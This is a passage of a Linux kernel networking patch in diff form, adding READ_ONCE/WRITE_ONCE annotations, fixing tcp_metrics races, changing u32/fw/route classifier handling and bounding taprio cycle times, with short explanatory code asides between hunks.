+ 		prot = inet->hdrincl ? IPPROTO_RAW : sk->sk_protocol;
+@@ -552,7 +552,7 @@ static void build_sk_flow_key(struct flowi4 *fl4, const struct sock *sk)
+ 	inet_opt = rcu_dereference(inet->inet_opt);
+ 	if (inet_opt && inet_opt->opt.srr)
+ 		daddr = inet_opt->opt.faddr;
+-	flowi4_init_output(fl4, sk->sk_bound_dev_if, sk->sk_mark,
++	flowi4_init_output(fl4, sk->sk_bound_dev_if, READ_ONCE(sk->sk_mark),
+ 			   ip_sock_rt_tos(sk) & IPTOS_RT_MASK,
+ 			   ip_sock_rt_scope(sk),
+ 			   inet->hdrincl ? IPPROTO_RAW : sk->sk_protocol,
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 9a8d59e9303a0..08921b96f9728 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -931,9 +931,9 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 	ctl_sk = this_cpu_read(ipv4_tcp_sk);
+ 	sock_net_set(ctl_sk, net);
+ 	ctl_sk->sk_mark = (sk->sk_state == TCP_TIME_WAIT) ?
+-			   inet_twsk(sk)->tw_mark : sk->sk_mark;
++			   inet_twsk(sk)->tw_mark : READ_ONCE(sk->sk_mark);
+ 	ctl_sk->sk_priority = (sk->sk_state == TCP_TIME_WAIT) ?
+-			   inet_twsk(sk)->tw_priority : sk->sk_priority;
++			   inet_twsk(sk)->tw_priority : READ_ONCE(sk->sk_priority);
+ 	transmit_time = tcp_transmit_time(sk);
+ 	ip_send_unicast_reply(ctl_sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index 82f4575f9cd90..99ac5efe244d3 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -40,7 +40,7 @@ struct tcp_fastopen_metrics {
+ 
+ struct tcp_metrics_block {
+ 	struct tcp_metrics_block __rcu	*tcpm_next;
+-	possible_net_t			tcpm_net;
++	struct net			*tcpm_net;
+ 	struct inetpeer_addr		tcpm_saddr;
+ 	struct inetpeer_addr		tcpm_daddr;
+ 	unsigned long			tcpm_stamp;
+@@ -51,34 +51,38 @@ struct tcp_metrics_block {
+ 	struct rcu_head			rcu_head;
+ };
+ 
+-static inline struct net *tm_net(struct tcp_metrics_block *tm)
++static inline struct net *tm_net(const struct tcp_metrics_block *tm)
+ {
+-	return read_pnet(&tm->tcpm_net);
++	/* Paired with the WRITE_ONCE() in tcpm_new() */
++	return READ_ONCE(tm->tcpm_net);
+ }
+ 
+ static bool tcp_metric_locked(struct tcp_metrics_block *tm,
+ 			      enum tcp_metric_index idx)
+ {
+-	return tm->tcpm_lock & (1 << idx);
++	/* Paired with WRITE_ONCE() in tcpm_suck_dst() */
++	return READ_ONCE(tm->tcpm_lock) & (1 << idx);
+ }
+ 
+-static u32 tcp_metric_get(struct tcp_metrics_block *tm,
++static u32 tcp_metric_get(const struct tcp_metrics_block *tm,
+ 			  enum tcp_metric_index idx)
+ {
+-	return tm->tcpm_vals[idx];
++	/* Paired with WRITE_ONCE() in tcp_metric_set() */
++	return READ_ONCE(tm->tcpm_vals[idx]);
+ }
+ 
+ static void tcp_metric_set(struct tcp_metrics_block *tm,
+ 			   enum tcp_metric_index idx,
+ 			   u32 val)
+ {
+-	tm->tcpm_vals[idx] = val;
++	/* Paired with READ_ONCE() in tcp_metric_get() */
++	WRITE_ONCE(tm->tcpm_vals[idx], val);
+ }
+ 
+ static bool addr_same(const struct inetpeer_addr *a,
+ 		      const struct inetpeer_addr *b)
+ {
+-	return inetpeer_addr_cmp(a, b) == 0;
++	return (a->family == b->family) && !inetpeer_addr_cmp(a, b);
+ }
+ 
+ struct tcpm_hash_bucket {
+@@ -89,6 +93,7 @@ static struct tcpm_hash_bucket	*tcp_metrics_hash __read_mostly;
+ static unsigned int		tcp_metrics_hash_log __read_mostly;
+ 
+ static DEFINE_SPINLOCK(tcp_metrics_lock);
++static DEFINE_SEQLOCK(fastopen_seqlock);
+ 
+ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 			  const struct dst_entry *dst,
+@@ -97,7 +102,7 @@ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 	u32 msval;
+ 	u32 val;
+ 
+-	tm->tcpm_stamp = jiffies;
++	WRITE_ONCE(tm->tcpm_stamp, jiffies);
+ 
+ 	val = 0;
+ 	if (dst_metric_locked(dst, RTAX_RTT))
+@@ -110,30 +115,42 @@ static void tcpm_suck_dst(struct tcp_metrics_block *tm,
+ 		val |= 1 << TCP_METRIC_CWND;
+ 	if (dst_metric_locked(dst, RTAX_REORDERING))
+ 		val |= 1 << TCP_METRIC_REORDERING;
+-	tm->tcpm_lock = val;
++	/* Paired with READ_ONCE() in tcp_metric_locked() */
++	WRITE_ONCE(tm->tcpm_lock, val);
+ 
+ 	msval = dst_metric_raw(dst, RTAX_RTT);
+-	tm->tcpm_vals[TCP_METRIC_RTT] = msval * USEC_PER_MSEC;
++	tcp_metric_set(tm, TCP_METRIC_RTT, msval * USEC_PER_MSEC);
+ 
+ 	msval = dst_metric_raw(dst, RTAX_RTTVAR);
+-	tm->tcpm_vals[TCP_METRIC_RTTVAR] = msval * USEC_PER_MSEC;
+-	tm->tcpm_vals[TCP_METRIC_SSTHRESH] = dst_metric_raw(dst, RTAX_SSTHRESH);
+-	tm->tcpm_vals[TCP_METRIC_CWND] = dst_metric_raw(dst, RTAX_CWND);
+-	tm->tcpm_vals[TCP_METRIC_REORDERING] = dst_metric_raw(dst, RTAX_REORDERING);
++	tcp_metric_set(tm, TCP_METRIC_RTTVAR, msval * USEC_PER_MSEC);
++	tcp_metric_set(tm, TCP_METRIC_SSTHRESH,
++		       dst_metric_raw(dst, RTAX_SSTHRESH));
++	tcp_metric_set(tm, TCP_METRIC_CWND,
++		       dst_metric_raw(dst, RTAX_CWND));
++	tcp_metric_set(tm, TCP_METRIC_REORDERING,
++		       dst_metric_raw(dst, RTAX_REORDERING));
+ 	if (fastopen_clear) {
++		write_seqlock(&fastopen_seqlock);
+ 		tm->tcpm_fastopen.mss = 0;
+ 		tm->tcpm_fastopen.syn_loss = 0;
+ 		tm->tcpm_fastopen.try_exp = 0;
+ 		tm->tcpm_fastopen.cookie.exp = false;
+ 		tm->tcpm_fastopen.cookie.len = 0;
++		write_sequnlock(&fastopen_seqlock);
+ 	}
+ }
+ 
+ #define TCP_METRICS_TIMEOUT		(60 * 60 * HZ)
+ 
+-static void tcpm_check_stamp(struct tcp_metrics_block *tm, struct dst_entry *dst)
++static void tcpm_check_stamp(struct tcp_metrics_block *tm,
++			     const struct dst_entry *dst)
+ {
+-	if (tm && unlikely(time_after(jiffies, tm->tcpm_stamp + TCP_METRICS_TIMEOUT)))
++	unsigned long limit;
++
++	if (!tm)
++		return;
++	limit = READ_ONCE(tm->tcpm_stamp) + TCP_METRICS_TIMEOUT;
++	if (unlikely(time_after(jiffies, limit)))
+ 		tcpm_suck_dst(tm, dst, false);
+ }
+ 
+@@ -174,20 +191,23 @@ static struct tcp_metrics_block *tcpm_new(struct dst_entry *dst,
+ 		oldest = deref_locked(tcp_metrics_hash[hash].chain);
+ 		for (tm = deref_locked(oldest->tcpm_next); tm;
+ 		     tm = deref_locked(tm->tcpm_next)) {
+-			if (time_before(tm->tcpm_stamp, oldest->tcpm_stamp))
++			if (time_before(READ_ONCE(tm->tcpm_stamp),
++					READ_ONCE(oldest->tcpm_stamp)))
+ 				oldest = tm;
+ 		}
+ 		tm = oldest;
+ 	} else {
+-		tm = kmalloc(sizeof(*tm), GFP_ATOMIC);
++		tm = kzalloc(sizeof(*tm), GFP_ATOMIC);
+ 		if (!tm)
+ 			goto out_unlock;
+ 	}
+-	write_pnet(&tm->tcpm_net, net);
++	/* Paired with the READ_ONCE() in tm_net() */
++	WRITE_ONCE(tm->tcpm_net, net);
++
+ 	tm->tcpm_saddr = *saddr;
+ 	tm->tcpm_daddr = *daddr;
+ 
+-	tcpm_suck_dst(tm, dst, true);
++	tcpm_suck_dst(tm, dst, reclaim);
+ 
+ 	if (likely(!reclaim)) {
+ 		tm->tcpm_next = tcp_metrics_hash[hash].chain;
+@@ -434,7 +454,7 @@ void tcp_update_metrics(struct sock *sk)
+ 					       tp->reordering);
+ 		}
+ 	}
+-	tm->tcpm_stamp = jiffies;
++	WRITE_ONCE(tm->tcpm_stamp, jiffies);
+ out_unlock:
+ 	rcu_read_unlock();
+ }
+@@ -539,8 +559,6 @@ bool tcp_peer_is_proven(struct request_sock *req, struct dst_entry *dst)
+ 	return ret;
+ }
+ 
+-static DEFINE_SEQLOCK(fastopen_seqlock);
+-
+ void tcp_fastopen_cache_get(struct sock *sk, u16 *mss,
+ 			    struct tcp_fastopen_cookie *cookie)
+ {
+@@ -647,7 +665,7 @@ static int tcp_metrics_fill_info(struct sk_buff *msg,
+ 	}
+ 
+ 	if (nla_put_msecs(msg, TCP_METRICS_ATTR_AGE,
+-			  jiffies - tm->tcpm_stamp,
++			  jiffies - READ_ONCE(tm->tcpm_stamp),
+ 			  TCP_METRICS_ATTR_PAD) < 0)
+ 		goto nla_put_failure;
+ 
+@@ -658,7 +676,7 @@ static int tcp_metrics_fill_info(struct sk_buff *msg,
+ 		if (!nest)
+ 			goto nla_put_failure;
+ 		for (i = 0; i < TCP_METRIC_MAX_KERNEL + 1; i++) {
+-			u32 val = tm->tcpm_vals[i];
++			u32 val = tcp_metric_get(tm, i);
+ 
+ 			if (!val)
+ 				continue;
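
The tcp_metrics hunks move fastopen_seqlock above tcpm_suck_dst() so the
fastopen fields are cleared under the same seqlock that readers such as
tcp_fastopen_cache_get() take. A minimal sketch of that reader/writer pairing
(demo_* names are illustrative):

  #include <linux/seqlock.h>

  static DEFINE_SEQLOCK(demo_seqlock);
  static struct { u16 mss; u8 syn_loss; } demo_fastopen;

  /* Writer: updates are bracketed so readers can detect them. */
  static void demo_clear(void)
  {
  	write_seqlock(&demo_seqlock);
  	demo_fastopen.mss = 0;
  	demo_fastopen.syn_loss = 0;
  	write_sequnlock(&demo_seqlock);
  }

  /* Reader: retries until it observes a stable snapshot. */
  static u16 demo_read_mss(void)
  {
  	unsigned int seq;
  	u16 mss;

  	do {
  		seq = read_seqbegin(&demo_seqlock);
  		mss = demo_fastopen.mss;
  	} while (read_seqretry(&demo_seqlock, seq));

  	return mss;
  }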
+diff --git a/net/ipv6/ip6mr.c b/net/ipv6/ip6mr.c
+index facdc78a43e5c..27fb5479988af 100644
+--- a/net/ipv6/ip6mr.c
++++ b/net/ipv6/ip6mr.c
+@@ -1073,7 +1073,7 @@ static int ip6mr_cache_report(const struct mr_table *mrt, struct sk_buff *pkt,
+ 		   And all this only to mangle msg->im6_msgtype and
+ 		   to set msg->im6_mbz to "mbz" :-)
+ 		 */
+-		skb_push(skb, -skb_network_offset(pkt));
++		__skb_pull(skb, skb_network_offset(pkt));
+ 
+ 		skb_push(skb, sizeof(*msg));
+ 		skb_reset_transport_header(skb);
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 4651aaf70db4f..4d5a27dd9a4b2 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -120,7 +120,7 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	fl6.flowi6_oif = oif;
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 33852fc38ad91..df3abd9e5237c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -612,7 +612,7 @@ static int rawv6_send_hdrinc(struct sock *sk, struct msghdr *msg, int length,
+ 	skb_reserve(skb, hlen);
+ 
+ 	skb->protocol = htons(ETH_P_IPV6);
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+ 
+@@ -772,12 +772,12 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	 */
+ 	memset(&fl6, 0, sizeof(fl6));
+ 
+-	fl6.flowi6_mark = sk->sk_mark;
++	fl6.flowi6_mark = READ_ONCE(sk->sk_mark);
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = fl6.flowi6_mark;
+ 
+ 	if (sin6) {
+ 		if (addr_len < SIN6_LEN_RFC2133)
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 0b060cb8681f0..960ab43a49c46 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -2952,7 +2952,8 @@ void ip6_sk_update_pmtu(struct sk_buff *skb, struct sock *sk, __be32 mtu)
+ 	if (!oif && skb->dev)
+ 		oif = l3mdev_master_ifindex(skb->dev);
+ 
+-	ip6_update_pmtu(skb, sock_net(sk), mtu, oif, sk->sk_mark, sk->sk_uid);
++	ip6_update_pmtu(skb, sock_net(sk), mtu, oif, READ_ONCE(sk->sk_mark),
++			sk->sk_uid);
+ 
+ 	dst = __sk_dst_get(sk);
+ 	if (!dst || !dst->obsolete ||
+@@ -3173,8 +3174,8 @@ void ip6_redirect_no_header(struct sk_buff *skb, struct net *net, int oif)
+ 
+ void ip6_sk_redirect(struct sk_buff *skb, struct sock *sk)
+ {
+-	ip6_redirect(skb, sock_net(sk), sk->sk_bound_dev_if, sk->sk_mark,
+-		     sk->sk_uid);
++	ip6_redirect(skb, sock_net(sk), sk->sk_bound_dev_if,
++		     READ_ONCE(sk->sk_mark), sk->sk_uid);
+ }
+ EXPORT_SYMBOL_GPL(ip6_sk_redirect);
+ 
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index d9253aa764fae..4bdd356bb5c46 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -567,8 +567,8 @@ static int tcp_v6_send_synack(const struct sock *sk, struct dst_entry *dst,
+ 		opt = ireq->ipv6_opt;
+ 		if (!opt)
+ 			opt = rcu_dereference(np->opt);
+-		err = ip6_xmit(sk, skb, fl6, skb->mark ? : sk->sk_mark, opt,
+-			       tclass, sk->sk_priority);
++		err = ip6_xmit(sk, skb, fl6, skb->mark ? : READ_ONCE(sk->sk_mark),
++			       opt, tclass, sk->sk_priority);
+ 		rcu_read_unlock();
+ 		err = net_xmit_eval(err);
+ 	}
+@@ -943,7 +943,7 @@ static void tcp_v6_send_response(const struct sock *sk, struct sk_buff *skb, u32
+ 		if (sk->sk_state == TCP_TIME_WAIT)
+ 			mark = inet_twsk(sk)->tw_mark;
+ 		else
+-			mark = sk->sk_mark;
++			mark = READ_ONCE(sk->sk_mark);
+ 		skb_set_delivery_time(buff, tcp_transmit_time(sk), true);
+ 	}
+ 	if (txhash) {
+@@ -1132,7 +1132,8 @@ static void tcp_v6_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+ 			READ_ONCE(req->ts_recent), sk->sk_bound_dev_if,
+ 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->saddr, l3index),
+-			ipv6_get_dsfield(ipv6_hdr(skb)), 0, sk->sk_priority,
++			ipv6_get_dsfield(ipv6_hdr(skb)), 0,
++			READ_ONCE(sk->sk_priority),
+ 			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 04f1d696503cd..27348172b25b9 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -622,7 +622,7 @@ int __udp6_lib_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	if (type == NDISC_REDIRECT) {
+ 		if (tunnel) {
+ 			ip6_redirect(skb, sock_net(sk), inet6_iif(skb),
+-				     sk->sk_mark, sk->sk_uid);
++				     READ_ONCE(sk->sk_mark), sk->sk_uid);
+ 		} else {
+ 			ip6_sk_redirect(skb, sk);
+ 		}
+@@ -1350,7 +1350,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	ipcm6_init(&ipc6);
+ 	ipc6.gso_size = READ_ONCE(up->gso_size);
+ 	ipc6.sockc.tsflags = sk->sk_tsflags;
+-	ipc6.sockc.mark = sk->sk_mark;
++	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* destination address check */
+ 	if (sin6) {
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 5137ea1861ce2..bce4132b0a5c8 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -519,7 +519,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	/* Get and verify the address */
+ 	memset(&fl6, 0, sizeof(fl6));
+ 
+-	fl6.flowi6_mark = sk->sk_mark;
++	fl6.flowi6_mark = READ_ONCE(sk->sk_mark);
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 696ba398d699a..937bd4c556151 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -102,7 +102,7 @@ static void mptcp_sol_socket_sync_intval(struct mptcp_sock *msk, int optname, in
+ 			break;
+ 		case SO_MARK:
+ 			if (READ_ONCE(ssk->sk_mark) != sk->sk_mark) {
+-				ssk->sk_mark = sk->sk_mark;
++				WRITE_ONCE(ssk->sk_mark, sk->sk_mark);
+ 				sk_dst_reset(ssk);
+ 			}
+ 			break;
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 49a5348a6a14f..777561b71fcbd 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -107,7 +107,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 		break;
+ 	case NFT_SOCKET_MARK:
+ 		if (sk_fullsock(sk)) {
+-			*dest = sk->sk_mark;
++			*dest = READ_ONCE(sk->sk_mark);
+ 		} else {
+ 			regs->verdict.code = NFT_BREAK;
+ 			return;
+diff --git a/net/netfilter/xt_socket.c b/net/netfilter/xt_socket.c
+index 7013f55f05d1e..76e01f292aaff 100644
+--- a/net/netfilter/xt_socket.c
++++ b/net/netfilter/xt_socket.c
+@@ -77,7 +77,7 @@ socket_match(const struct sk_buff *skb, struct xt_action_param *par,
+ 
+ 		if (info->flags & XT_SOCKET_RESTORESKMARK && !wildcard &&
+ 		    transparent && sk_fullsock(sk))
+-			pskb->mark = sk->sk_mark;
++			pskb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 		if (sk != skb->sk)
+ 			sock_gen_put(sk);
+@@ -138,7 +138,7 @@ socket_mt6_v1_v2_v3(const struct sk_buff *skb, struct xt_action_param *par)
+ 
+ 		if (info->flags & XT_SOCKET_RESTORESKMARK && !wildcard &&
+ 		    transparent && sk_fullsock(sk))
+-			pskb->mark = sk->sk_mark;
++			pskb->mark = READ_ONCE(sk->sk_mark);
+ 
+ 		if (sk != skb->sk)
+ 			sock_gen_put(sk);
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 6ab9d5b543387..1681068400733 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2052,8 +2052,8 @@ retry:
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = sk->sk_priority;
+-	skb->mark = sk->sk_mark;
++	skb->priority = READ_ONCE(sk->sk_priority);
++	skb->mark = READ_ONCE(sk->sk_mark);
+ 	skb->tstamp = sockc.transmit_time;
+ 
+ 	skb_setup_tx_timestamp(skb, sockc.tsflags);
+@@ -2575,8 +2575,8 @@ static int tpacket_fill_skb(struct packet_sock *po, struct sk_buff *skb,
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = po->sk.sk_priority;
+-	skb->mark = po->sk.sk_mark;
++	skb->priority = READ_ONCE(po->sk.sk_priority);
++	skb->mark = READ_ONCE(po->sk.sk_mark);
+ 	skb->tstamp = sockc->transmit_time;
+ 	skb_setup_tx_timestamp(skb, sockc->tsflags);
+ 	skb_zcopy_set_nouarg(skb, ph.raw);
+@@ -2978,7 +2978,7 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		goto out_unlock;
+ 
+ 	sockcm_init(&sockc, sk);
+-	sockc.mark = sk->sk_mark;
++	sockc.mark = READ_ONCE(sk->sk_mark);
+ 	if (msg->msg_controllen) {
+ 		err = sock_cmsg_send(sk, msg, &sockc);
+ 		if (unlikely(err))
+@@ -3052,7 +3052,7 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 
+ 	skb->protocol = proto;
+ 	skb->dev = dev;
+-	skb->priority = sk->sk_priority;
++	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc.mark;
+ 	skb->tstamp = sockc.transmit_time;
+ 
+diff --git a/net/sched/cls_fw.c b/net/sched/cls_fw.c
+index 1212b057b129c..6160ef7d646ac 100644
+--- a/net/sched/cls_fw.c
++++ b/net/sched/cls_fw.c
+@@ -265,7 +265,6 @@ static int fw_change(struct net *net, struct sk_buff *in_skb,
+ 			return -ENOBUFS;
+ 
+ 		fnew->id = f->id;
+-		fnew->res = f->res;
+ 		fnew->ifindex = f->ifindex;
+ 		fnew->tp = f->tp;
+ 
+diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
+index 9e43b929d4ca4..306188bf2d1ff 100644
+--- a/net/sched/cls_route.c
++++ b/net/sched/cls_route.c
+@@ -511,7 +511,6 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
+ 	if (fold) {
+ 		f->id = fold->id;
+ 		f->iif = fold->iif;
+-		f->res = fold->res;
+ 		f->handle = fold->handle;
+ 
+ 		f->tp = fold->tp;
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index 1280736a7b92e..ba93e2a6bdbb4 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -824,7 +824,6 @@ static struct tc_u_knode *u32_init_knode(struct net *net, struct tcf_proto *tp,
+ 
+ 	new->ifindex = n->ifindex;
+ 	new->fshift = n->fshift;
+-	new->res = n->res;
+ 	new->flags = n->flags;
+ 	RCU_INIT_POINTER(new->ht_down, ht);
+ 
+@@ -1022,18 +1021,62 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		return -EINVAL;
+ 	}
+ 
++	/* At this point, we need to derive the new handle that will be used to
++	 * uniquely map the identity of this table match entry. The
++	 * identity of the entry that we need to construct is 32 bits made of:
++	 *     htid(12b):bucketid(8b):node/entryid(12b)
++	 *
++	 * At this point _we have the table(ht)_ in which we will insert this
++	 * entry. We carry the table's id in variable "htid".
++	 * Note that earlier code picked the ht selection either by a) the user
++	 * providing the htid via the TCA_U32_HASH attribute or b) when no such
++	 * attribute is passed, in which case the root ht is used, defaulting to
++	 * ID 0x[800][00][000]. Rule: the root table has a single bucket with ID 0.
++	 * If OTOH the user passed us the htid, they may also pass a bucketid of
++	 * choice. 0 is fine. For example, a user htid of 0x[600][01][000]
++	 * indicates a hash bucketid of 1. Rule: the entry/node ID _cannot_ be
++	 * passed via the htid, so even if it was non-zero it will be ignored.
++	 *
++	 * We may also have a handle, if the user passed one. The handle also
++	 * carries the same addressing of htid(12b):bucketid(8b):node/entryid(12b).
++	 * Rule: the bucketid on the handle is ignored even if one was passed;
++	 * rather the value on "htid" is always assumed to be the bucketid.
++	 */
+ 	if (handle) {
++		/* Rule: The htid from handle and tableid from htid must match */
+ 		if (TC_U32_HTID(handle) && TC_U32_HTID(handle ^ htid)) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Handle specified hash table address mismatch");
+ 			return -EINVAL;
+ 		}
+-		handle = htid | TC_U32_NODE(handle);
+-		err = idr_alloc_u32(&ht->handle_idr, NULL, &handle, handle,
+-				    GFP_KERNEL);
+-		if (err)
+-			return err;
+-	} else
++		/* Ok, so far we have a valid htid(12b):bucketid(8b) but we
++		 * need to finalize the table entry identification with the last
++		 * part - the node/entryid(12b). Rule: Nodeid _cannot be 0_ for
++		 * entries. Rule: nodeid of 0 is reserved only for tables (see
++		 * earlier code which processes the TC_U32_DIVISOR attribute).
++		 * Rule: The nodeid can only be derived from the handle (and not
++		 * htid).
++		 * Rule: if the handle specified zero for the node id, for example
++		 * 0x60000000, then pick a new nodeid from the pool of IDs
++		 * this hash table has been allocating from.
++		 * If OTOH it is specified (i.e. the user passed a handle such
++		 * as 0x60000123), then we use it to generate our final handle,
++		 * which is used to uniquely identify the match entry.
++		 */
++		if (!TC_U32_NODE(handle)) {
++			handle = gen_new_kid(ht, htid);
++		} else {
++			handle = htid | TC_U32_NODE(handle);
++			err = idr_alloc_u32(&ht->handle_idr, NULL, &handle,
++					    handle, GFP_KERNEL);
++			if (err)
++				return err;
++		}
++	} else {
++		/* The user did not give us a handle; let's just generate one
++		 * from the table's pool of nodeids.
++		 */
+ 		handle = gen_new_kid(ht, htid);
++	}
+ 
+ 	if (tb[TCA_U32_SEL] == NULL) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Selector not specified");
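
The comment block added above describes the 32-bit u32 handle as
htid(12b):bucketid(8b):node/entryid(12b). As a rough illustration of that
packing (the DEMO_* macros below shift the fields out for readability; note
that the real TC_U32_HTID() in include/uapi/linux/pkt_cls.h masks the top
bits without shifting):

  /* 32-bit u32 classifier handle:
   *   bits 31..20  hash table id (htid)
   *   bits 19..12  bucket id
   *   bits 11..0   node / entry id
   */
  #define DEMO_HTID(h)	(((h) >> 20) & 0xFFFu)
  #define DEMO_BUCKET(h)	(((h) >> 12) & 0xFFu)
  #define DEMO_NODE(h)	((h) & 0xFFFu)

  static unsigned int demo_make_handle(unsigned int htid,
  				     unsigned int bucket,
  				     unsigned int node)
  {
  	return (htid << 20) | (bucket << 12) | node;
  }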
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index a274a9332f333..8d5eebb2dd1b1 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -769,6 +769,11 @@ static const struct nla_policy taprio_tc_policy[TCA_TAPRIO_TC_ENTRY_MAX + 1] = {
+ 	[TCA_TAPRIO_TC_ENTRY_MAX_SDU]	   = { .type = NLA_U32 },
+ };
+ 
++static struct netlink_range_validation_signed taprio_cycle_time_range = {
++	.min = 0,
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy taprio_policy[TCA_TAPRIO_ATTR_MAX + 1] = {
+ 	[TCA_TAPRIO_ATTR_PRIOMAP]	       = {
+ 		.len = sizeof(struct tc_mqprio_qopt)
+@@ -777,7 +782,8 @@ static const struct nla_policy taprio_policy[TCA_TAPRIO_ATTR_MAX + 1] = {
+ 	[TCA_TAPRIO_ATTR_SCHED_BASE_TIME]            = { .type = NLA_S64 },
+ 	[TCA_TAPRIO_ATTR_SCHED_SINGLE_ENTRY]         = { .type = NLA_NESTED },
+ 	[TCA_TAPRIO_ATTR_SCHED_CLOCKID]              = { .type = NLA_S32 },
+-	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME]           = { .type = NLA_S64 },
++	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME]           =
++		NLA_POLICY_FULL_RANGE_SIGNED(NLA_S64, &taprio_cycle_time_range),
+ 	[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME_EXTENSION] = { .type = NLA_S64 },
+ 	[TCA_TAPRIO_ATTR_FLAGS]                      = { .type = NLA_U32 },
+ 	[TCA_TAPRIO_ATTR_TXTIME_DELAY]		     = { .type = NLA_U32 },
+@@ -913,6 +919,11 @@ static int parse_taprio_schedule(struct taprio_sched *q, struct nlattr **tb,
+ 			return -EINVAL;
+ 		}
+ 
++		if (cycle < 0 || cycle > INT_MAX) {
++			NL_SET_ERR_MSG(extack, "'cycle_time' is too big");
++			return -EINVAL;
++		}
++
+ 		new->cycle_time = cycle;
+ 	}
+ 
+@@ -1110,7 +1121,7 @@ static void setup_txtime(struct taprio_sched *q,
+ 			 struct sched_gate_list *sched, ktime_t base)
+ {
+ 	struct sched_entry *entry;
+-	u32 interval = 0;
++	u64 interval = 0;
+ 
+ 	list_for_each_entry(entry, &sched->entries, list) {
+ 		entry->next_txtime = ktime_add_ns(base, interval);
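
Two guards land in taprio here: cycle_time is now rejected when it exceeds
INT_MAX, and setup_txtime() accumulates per-entry intervals in a u64. The
width change matters because a u32 sum of nanosecond intervals wraps after
roughly 4.29 seconds. A toy illustration (demo_total_interval() is invented):

  #include <linux/types.h>

  /* Summing nanosecond gate intervals: a u32 wraps at ~4.29 s,
   * a u64 is effectively unbounded for this purpose.
   */
  static u64 demo_total_interval(const u32 *interval, int n)
  {
  	u64 total = 0;	/* was effectively 32-bit in the buggy version */
  	int i;

  	for (i = 0; i < n; i++)
  		total += interval[i];

  	return total;
  }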
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 02d1daae77397..5ae0a54a823b5 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
